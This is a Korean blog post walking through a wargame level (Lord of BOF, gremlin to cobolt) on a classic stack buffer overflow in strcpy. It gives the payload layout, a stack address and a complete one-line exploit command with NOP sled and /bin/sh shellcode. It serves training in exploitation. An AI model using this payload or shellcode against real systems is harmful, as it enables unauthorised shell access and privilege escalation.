BOF redhat 원정대 gremlin -> cobolt
cobolt, cobolt.c
이전 문제와 버퍼의 크기가 작아졌다는 것을 빼고는 다를 것이 없다.
strcpy에서 취약점이 발생하고 길이를 체크하지 않기 때문에 쉘코드를 RET를 덮은 이후에 넣어도 될 것같다.
gdb로 디스어셈블.
버퍼크기가 256에서 16으로 나머지는 바뀌고 똑같다. 이전 문제와 비슷하게 쉘코드를 구성해보면
[버퍼][SFP][RET]
[ 20 ][RET][nop][쉘코드]
놉을 넣은 이유는 쉘코드를 바로 포인팅안해도 쉘코드가 실행될수 있도록 가능성을 높이기위해서이다.
A를 20개 넣고 실행 한 후 메모리를 보고 RET 다음의 주소를 알아내었다. 0xbffffaf0
위의 쉘코드 구성대로 쉘코드를 작성하고 공격하면
cobolt의 권한으로 쉘을 얻을 수 있다.
쉘코드 :
./cobolt `python -c 'print "A"*20 + "\xf0\xfa\xff\xbf" +"\x90"*50 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Categories
- programming (17)
- security (46)
- study (22)
- system (35)
Recent 7 Days Popular Posts
-
이 자료는 우리가 KITRI (한국정보기술연구원) 침해대응 과정 중 수료 프로젝트로 진행했던 자료이다. 취약점을 분석해논 우리나라 자료가 거의 존재하지 않았기 때문에 어떻게 분석해야 하는지 매우 막막했다. 특히 3897 취약점은 인터넷 익...
-
프로그램은 실행하면서 많은 함수를 호출한다. 함수가 호출되고 호출받은 함수가 실행되려면 레지스터와 스택을 사용해야 한다. 버퍼오버플로우 공격을 공부하면서 호출된 함수가 어떻게 esp (스택을 관리하는 레지스터)를 백업하는지 어떻게 스택을 독립적으로 ...
-
_start, __libc_start_main, main hello를 출력하는 hello C언어로 작성한 간단한 elf파일의 헤더를 보면 실행파일의 시작주소값인 Entry point address에 _start 의 주소가 들...
-
현재 메모리에 올라가 있는 process 목록을 구하는 api CreateToolHelp32Snapshot() Process32First() Process32Next() walking process API를 이용해 explorer.e...
-
dll injection이나 메모리 관리상의 문제로 인해 프로세스 로딩시에 모든 dll을 로딩 하지 못할 수 있다. 이런 경우 dynamic loading 으로 dll을 메모리에 로딩 시킬 수 있다.




0 개의 댓글:
댓글 쓰기